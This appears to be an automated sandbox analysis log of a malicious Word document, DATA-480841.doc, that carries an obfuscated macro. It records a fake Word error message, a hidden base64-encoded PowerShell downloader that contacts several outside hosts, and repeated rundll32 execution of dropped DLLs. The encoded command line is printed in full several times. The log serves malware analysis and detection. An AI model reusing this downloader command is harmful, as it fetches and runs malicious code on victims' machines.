                    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
                    Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iiasa\gdao.xuk',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqftsc\netes.ucb',Control_RunDLL
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLLJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iiasa\gdao.xuk',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqftsc\netes.ucb',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                    Source: Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2107818605.0000000001E80000.00000002.00000001.sdmp
                    Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
                    Source: DATA-480841.docInitial sample: OLE summary subject = lime payment B2B responsive Practical solid state copy compelling

                    Data Obfuscation:

                    barindex
                    Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                    Source: DATA-480841.docStream path 'Macros/VBA/Owppnp8hah4xo788' : High number of GOTO operations
                    Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Owppnp8hah4xo788Name: Owppnp8hah4xo788
                    Obfuscated command line foundShow sources
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
                    PowerShell case anomaly foundShow sources
